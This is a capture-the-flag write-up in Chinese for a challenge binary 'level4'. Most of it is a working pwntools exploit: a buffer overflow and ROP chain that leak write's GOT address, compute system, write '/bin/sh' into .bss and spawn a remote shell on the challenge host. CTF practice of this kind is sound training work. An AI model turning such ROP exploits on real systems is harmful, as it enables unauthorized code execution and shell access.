这道题在没有 libc 的情况下考察地址泄漏，有两个方法：一个是 read 之后直接 pop 三个栈参数再返回 system；另一个是重新返回 vulnerable 函数。只不过 read 只读 8 字节，所以要用 send，而不是 sendline。
另外一个大坑点在 DynELF 的使用：只能通过它泄漏偏移，然后再用不带它的版本重写一遍。
传说中的不用libc的另一方法http://www.cnblogs.com/wangaohui/p/5123992.html
from pwn import *
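# The two statements on the original first line were fused together (missing
# newline), which is a SyntaxError; they are split here.
# Connection to the challenge service from the writeup, plus the local copy
# of the binary used to resolve symbols.
p=remote('218.2.197.235',20433)
elf=ELF('./level4')
# PLT entries taken from the local binary. NOTE(review): using these values
# against the remote process only works if the binary is a non-PIE build
# loaded at a fixed base (the hard-coded addresses below assume the same) —
# confirm with checksec before relying on them.
write_plt=elf.symbols['write']
read_plt=elf.symbols['read']
# Address of the vulnerable function; every ROP frame below returns here so
# the same overflow can be triggered again for the next stage.
vul=0x0804844B
# Writable .bss address used as scratch space for the string read in later
# and passed as the argument in the final stage.
bss=0x0804A024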
def leak(add):
    # Read 4 bytes of process memory at address `add` and return them raw.
    # The overflow frame returns into write@plt with `vul` as write's return
    # address, and write(1, add, 4) as its arguments, so the process prints
    # the 4 bytes and then re-enters the vulnerable function.
    # Padding: presumably a 0x88-byte buffer plus the 4-byte saved frame
    # pointer — verify against the binary.
    # p.sendline appends '\n' after the chain; the writeup's send/sendline
    # caveat concerns the later 8-byte read, which uses send().
    payload='A'*(0x88+4)+p32(write_plt)+p32(vul)+p32(1)+p32(add)+p32(4)
    p.sendline(payload)
    addc=p.recv(4)
    return addc
#d = DynELF(leak, elf=ELF('./level4'))
#system_addr = d.lookup('system', 'libc')
#print "system_addr=" + hex(system_addr)
#payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
#p.sendline(payload)
#p.sendline('/bin/sh\0')
#payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
#p.sendline(payload)
#p.interactive()
# Leak the runtime address of write from its GOT entry, then derive system
# from a fixed distance to it. Per the writeup this offset was first found
# with DynELF (the commented-out block above) and then hard-coded so the
# exploit runs without it; presumably it is specific to the remote libc
# build and must be recomputed for any other target.
wr=leak(elf.got['write'])
offset=-0x8ab00
system_addr=u32(wr)+offset
#pppr = 0x08048509
#payload='A'*(0x88+4)+p32(read_plt)+p32(pppr)+p32(0)+p32(bss)+p32(8)+p32(system_addr) + p32(vulfun_addr) + p32(bss)
#p.sendline(payload)
#p.send("/bin/sh\0")
# Stage 1: overflow into read@plt with read(0, bss, 8), returning to vul.
# The string is delivered with send(), not sendline(): read is asked for
# exactly 8 bytes, so an extra newline must not be appended (the point the
# writeup stresses).
payload='A'*(0x88+4)+p32(read_plt)+p32(vul)+p32(0)+p32(bss)+p32(8)
p.sendline(payload)
p.send('/bin/sh\0')
# Stage 2: overflow into system(bss) with vul as the return address, then
# hand the connection to the user.
payload='A'*(0x88+4)+p32(system_addr)+p32(vul)+p32(bss)
p.sendline(payload)
p.interactive()